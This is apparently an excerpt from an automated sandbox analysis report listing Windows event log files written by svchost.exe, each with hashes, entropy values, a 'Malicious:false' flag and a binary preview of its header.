                                                                                                                                Preview:ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.894450290243595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:EpgjQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9Yfr:6HuJ
                                                                                                                                MD5:F57C7ECE707AC802D43AD44BB82544B4
                                                                                                                                SHA1:3CF81EAFDA5B23B1F22F59467877D0B4BE950E00
                                                                                                                                SHA-256:196CEB0EED008598447795DB2E7068EE73DE2FBEE0739F24DDE78C69FE3CD4F7
                                                                                                                                SHA-512:3466151643EB3AFD4A51785E379B5319F3ED0B283C81A4EE913AA21A6AB5D2B469A7F95467EF3AA2FD7DCC777CD9B24C3E9C1B5659DDA94D834033E682D1C350
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.v.......x.......v.......x...........P...`............................................................................p6........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......S?;.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 25, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92008
                                                                                                                                Entropy (8bit):2.682215662038313
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:g3h1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzB:yMAP1Qa5AgfQQzy4MAP1Qa5AgfQQzy
                                                                                                                                MD5:CEE49B81AB0DB9CDAFF3101A6C3CA6F3
                                                                                                                                SHA1:68BF544E0ADB9E20CC198783C921FF51037CED72
                                                                                                                                SHA-256:C5B208F8AC6C6736B4CCF05F28ED62EF96282FAF263005D428F62BE49F8ACC27
                                                                                                                                SHA-512:C11FD4D3E9787982DE7A9D17050A40125AD6D9CAFC655B9B4EC305FD767354D6F48E66E093B52A7E750359CC08FD8D3C557962FC92A23AA2D62D6FA249B75679
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile........................................................................................................................WElfChnk......................................c...f..W.s.......................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.441017411582523
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
                                                                                                                                MD5:8D30244BF7119CFA2F8A7A5AF8FCDAB7
                                                                                                                                SHA1:F0827675265E0DF98A4967D8A539D476551DCAA6
                                                                                                                                SHA-256:489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
                                                                                                                                SHA-512:C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U*..&....$..........."..............=1......**......q........|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.2803522685445374
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
                                                                                                                                MD5:4A70DB2946C129829BEDDB2E147FBE04
                                                                                                                                SHA1:4D3255FABE0E857840591072D9370047FDDFB83A
                                                                                                                                SHA-256:C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
                                                                                                                                SHA-512:7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.445920452673848
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
                                                                                                                                MD5:21B26F726BBEBA7FD5C4C45386FC544F
                                                                                                                                SHA1:F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
                                                                                                                                SHA-256:63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
                                                                                                                                SHA-512:A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.1562721664799103
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
                                                                                                                                MD5:B2C3D7448B237C268D23FE1A78777AA5
                                                                                                                                SHA1:6C3A39325392F2B088C00CDC1763268F15832447
                                                                                                                                SHA-256:05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
                                                                                                                                SHA-512:F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.9195298486885948
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
                                                                                                                                MD5:D4A00CC59E964B7DFD6EFDB643322E9E
                                                                                                                                SHA1:7307AF862B22D743BF6B531829DABE041E9F1F92
                                                                                                                                SHA-256:49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
                                                                                                                                SHA-512:51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69080
                                                                                                                                Entropy (8bit):0.5730314040344844
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:43VNVaO8ioBOPKzUmOPZXAOPoQVNVaO8ioBOPKzUmOPZXAOPo:43fV7cOP4XOPWOPzfV7cOP4XOPWOP
                                                                                                                                MD5:F0C6298FAC645EFCA1A244C555A4969E
                                                                                                                                SHA1:AE6ADF0928422749C2AB9C541B7F60A08DC79070
                                                                                                                                SHA-256:F56C618912B59C1DFEFBBC3209A98A2977905C2FA3193AFE2DA191171CF0F684
                                                                                                                                SHA-512:82FD4BFBDF355E2E0A4A59ECD01832BCDC9C93BFA24A0F6DE23B2E86F057C07AED91298C52D28E87394EE065E39A954BCB7C2F2F87766733E864DC7F857C9775
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X...K../....................................................................`...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..p...~.........Jf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 418, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33640
                                                                                                                                Entropy (8bit):5.68383804089823
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:fPhKa5SzuzNz0zxzuewKWMKFza5rta5ya5e69a5nla5f2KnzyzIzka50bNa5Pa5T:XfSik7DQGAdNC
                                                                                                                                MD5:06EC64C68B4A523C812A6A96DF001625
                                                                                                                                SHA1:D9329950DFAAB1D084D2FB7CD02F26EBAD82F936
                                                                                                                                SHA-256:6D19DC73F87323FB08C91D6810A4F9954E70898EE87666F108F010CA4CF247C6
                                                                                                                                SHA-512:05895C55059DA616918AB4813143F0524F4ADC3FA01A10C70E05F3BFF46F27C82AD87BCE6EB175F371A3A76D035A1BC165635F994FF543C59231A214327568A5
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile......................................................................................................................?I.ElfChnk.............................................(e........................................................................h........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................V...........................1...{!......**...............O..e.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.119748237037944
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
                                                                                                                                MD5:D1CFC256BC075DC75D7FD92207C9C0F2
                                                                                                                                SHA1:587C19CF65305AD470E82AB5A1ED5B2E36472625
                                                                                                                                SHA-256:6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
                                                                                                                                SHA-512:85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.182756017330751
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
                                                                                                                                MD5:9BA8F6B60705B6A27084436D1D4370AD
                                                                                                                                SHA1:DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
                                                                                                                                SHA-256:580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
                                                                                                                                SHA-512:BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):77968
                                                                                                                                Entropy (8bit):3.339514668703203
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:fWIjyeIXIpIBIsIEI2I5gI8bIqz1IkvIoIZIqIxIzIYI6IrIBI2I43hDIEQAGxIt:fJd3ZxGe6dX
                                                                                                                                MD5:F07A7699E03D5B71B9F19F3E22C99FEE
                                                                                                                                SHA1:7701FBB0623B2F1C85EF9F1A43FD121F2EEF6A63
                                                                                                                                SHA-256:99D6740A4674C1C185022B2E8B29EC2D83AF0DA4A8A2275CA0A3960C64BD72C8
                                                                                                                                SHA-512:DDA391BB346F356DF4623BCB3B3C2F16FDAB6F6BD53720C0C1F8387B158F2A6347B7048AB486B109F09AC354F44D5E3CAEA103003F5898AFFD8A3C7E682E38CE
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.T...............T...................x...h.....)......................................................................>..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......x........m0.PN.........Z...V..............................................................,.......D.....!........... ....@.m0.PN..0.U.f....2U.f...........x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l...........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.800476718060657
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
                                                                                                                                MD5:F25E3A5940E51F9A49AC271DE377E2C1
                                                                                                                                SHA1:38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
                                                                                                                                SHA-256:D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
                                                                                                                                SHA-512:CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.999140584854273
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
                                                                                                                                MD5:5234109523F4243D8DFEEAFD9202BC60
                                                                                                                                SHA1:49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
                                                                                                                                SHA-256:D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
                                                                                                                                SHA-512:C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................(...8...|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):77496
                                                                                                                                Entropy (8bit):4.034465034834504
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:Kexow407SZRcZv76NcRkpHrWbGyYKQc90XkztputDBjV8k+u3eUtHpoVWWPjRKv3:1ztputDBjV8k+u3PtHpoVWF
                                                                                                                                MD5:3F10D5677FB39CF11045012BF6A398A1
                                                                                                                                SHA1:EB0F1747BB64C2A109A0C7CC70B421DAD0C8C6A3
                                                                                                                                SHA-256:3AB79F9431F00F6EAFB5532E4DD44890620BB258AD36E067BA8C70733698FF2D
                                                                                                                                SHA-512:7CE98C74B22D1B99EDC9ADEB064A219477ECA0CEBCBB217EBBA46971E739511CFAACDA0D56533AC04C6394249B31FB0C1FD153E54D488AD129CF216701B334C1
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.................J.......O...............x..............................................................................................."...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..P...J.........$.QN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):68240
                                                                                                                                Entropy (8bit):4.405400501741596
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:CYY1RFYY1RLpCnz/Gh4wRub4r2ag+LpSMI4ZStDCJ:CYYnFYYnLpqGhsi2pMnI4z
                                                                                                                                MD5:BA877BFABDB61D4D3A3E1C95DA76A3A7
                                                                                                                                SHA1:1F678EDFAB84317DCB7716C7CD8C1B2CF7DB5DD7
                                                                                                                                SHA-256:63BC91B902FFAD108344B46FF468CA20BD140EDB91548BB5AF04068A6AB71348
                                                                                                                                SHA-512:A5717B471836EF5C8CC975223E0C4DACAF139BB2FDD400610B4EE08BB345B6A99FDF98D0DC9D328DBE4CAEB4D28A95F0F586158B0AF2BE2DB3B302829D9608B0
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk._......._......._......._...................e~.[....................................................................x.."................p...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...................I...................**......_...........PN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.760021633915647
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
                                                                                                                                MD5:91415CB1A68CB19DCDB017402AAEB51E
                                                                                                                                SHA1:EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
                                                                                                                                SHA-256:EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
